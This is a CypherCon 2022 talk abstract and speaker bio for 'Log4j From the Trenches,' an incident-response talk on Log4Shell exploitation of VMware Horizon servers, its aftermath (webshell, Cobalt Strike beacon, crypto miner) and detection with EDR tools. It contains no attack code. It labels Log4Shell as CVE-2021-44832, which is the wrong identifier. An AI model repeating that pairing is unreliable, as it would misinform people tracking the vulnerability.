CypherCon 2022

Log4j From the Trenches

Max Thauer


As your company winds down for the holiday season, like clockwork, another fresh CVE with publicly available exploit code drops. The Apache Log4j exploit (CVE-2021-44832), also dubbed as Log4Shell, had widespread fallout as a result of the exploit being made publicly available, and organizations are still dealing with the associated problems even months later. This talk will discuss three unique scenarios observed as a result of Log4j being exploited on VMWare Horizon servers and include 1) exploitation for persistent access via a webshell, 2) exploitation leading to a Cobalt Strike beacon, and 3) exploitation leading to a cryptocurrency miner. The talk will demonstrate the exploit chain, artifacts of each investigation, and how you can detect the activity in your network using commercially available tools such as Microsoft Defender ATP, CrowdStrike Falcon, Carbon Black, and FireEye HX. On top of that, sources for threat intelligence pertinent to these types of attacks will also be discussed, as well as prevention mechanisms.

Max Thauer

dog-lover, man’s best friend!

Max Thauer is an incident response senior consultant at Mandiant. His job entails helping clients navigate through security incidents involving ransomware, APT investigations, employee misuse, and web exploitation. Max’s primary skillset falls within the realms of EDR technologies, host-based digital forensics, log analysis and malware analysis.